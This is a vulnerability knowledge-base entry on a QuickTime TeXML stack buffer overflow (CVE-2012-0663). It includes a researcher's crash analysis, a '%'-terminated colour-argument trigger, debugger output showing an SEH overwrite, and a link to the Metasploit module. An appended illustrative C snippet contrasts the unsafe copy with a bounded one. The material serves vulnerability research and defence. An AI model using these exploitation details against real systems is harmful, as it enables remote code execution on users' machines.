CVE-2012-0663 Apple Quicktime Buffer Overflow

2019-05-09T17:57:16
ID AKB:42CF829F-641F-4729-87B7-3BD8FB4D042B
Type attackerkb
Reporter AttackerKB
Modified 2020-02-13T17:12:07

Description

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

Recent assessments:

wchen-r7 at 2019-09-12T18:07:55.877043Z reported:

```
Down p sub_67EED2E0+193 call dangerous_copy_sub_67EED1E0 <-- Interesting (0x67EED473)
Down p sub_67EED2E0+1E7 call dangerous_copy_sub_67EED1E0
Down p sub_67EED2E0+23C call dangerous_copy_sub_67EED1E0
Down p sub_67EED2E0+28D call dangerous_copy_sub_67EED1E0
Down p manage_transform_sub_67EED810+B6 call dangerous_copy_sub_67EED1E0 (*) this is the one we have reviewed
```

We noticed that sub_67EED2E0+193 can also trigger the crash, with even longer data without triggering the warning. In this particular case, the parser is handling arguments ending with a "%", which can be reached as a 'color' argument, for example:

{ color: AAAAAAAAAAAAAA% }

Where "AAAAAAAAAAAAAA" will be copied on the stack. Also see poc3.xml for an example.

As a result, we get to overwrite the stack with more data (like I said), and we end up overwriting the SEH:

```
(c54.da8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\QuickTime\QTSystem\QuickTime3GPP.qtx -
eax=00000030 ebx=0013cc25 ecx=0e0a7288 edx=0000355f esi=00140000 edi=0013cba0
eip=67eed1f3 esp=0013cb74 ebp=00000004 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
QuickTime3GPP!EatTx3gComponentDispatch+0x4033:
67eed1f3 8806            mov     byte ptr [esi],al          ds:0023:00140000=41
0:000> !exchain
0013ce24: 30303030
Invalid exception stack at 30303030
0:000> g
(c54.da8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=30303030 edx=7c9032bc esi=00000000 edi=00000000
eip=30303030 esp=0013c7a4 ebp=0013c7c4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
30303030 ??              ???
```

quicktime.qts does not have SafeSEH protection.

The final version of the exploit can be found here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/apple_quicktime_texml.rb
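The copy pattern the assessment describes (a "%"-terminated style value copied onto a fixed-size stack buffer with no length check) beside a bounded version of the same parse, as an added example for illustration; this is not code from the AttackerKB record, QuickTime, or the Metasploit module, and the function names, the `VALUE_MAX` buffer size and the sample arguments are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define VALUE_MAX 16  /* constructed size of the destination stack buffer */

/* Vulnerable pattern (illustrative, never called here): copy bytes up to the
 * '%' terminator with no bound on dst, so a long value overruns the stack. */
static void copy_percent_value_unbounded(const char *src, char *dst)
{
    while (*src && *src != '%')
        *dst++ = *src++;
    *dst = '\0';
}

/* Hardened version of the same copy, bounded by the destination size.
 * Returns the number of bytes copied, or -1 when the value does not fit
 * or no '%' terminator is found before the end of the input. */
static int copy_percent_value_bounded(const char *src, char *dst, size_t dst_size)
{
    size_t n = 0;
    if (dst_size == 0) return -1;
    while (src[n] != '\0' && src[n] != '%') {
        if (n + 1 >= dst_size)      /* keep room for the terminating NUL */
            return -1;
        dst[n] = src[n];
        n++;
    }
    if (src[n] != '%') return -1;   /* unterminated value: reject */
    dst[n] = '\0';
    return (int)n;
}

/* Parse a "{ color: <value>% }" argument into a fixed stack buffer.
 * Returns 0 when accepted, -1 when rejected. */
int parse_color_arg(const char *arg, char *out, size_t out_size)
{
    const char *p = strstr(arg, "color:");
    if (!p) return -1;
    p += strlen("color:");
    while (*p == ' ') p++;
    return copy_percent_value_bounded(p, out, out_size) < 0 ? -1 : 0;
}

int main(void)
{
    char buf[VALUE_MAX];
    const char *ok = "{ color: 50% }";
    const char *overlong = "{ color: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA% }";
    printf("%s -> %d (%s)\n", ok, parse_color_arg(ok, buf, sizeof buf), buf);
    printf("%s -> %d\n", overlong, parse_color_arg(overlong, buf, sizeof buf));
    return 0;
}
```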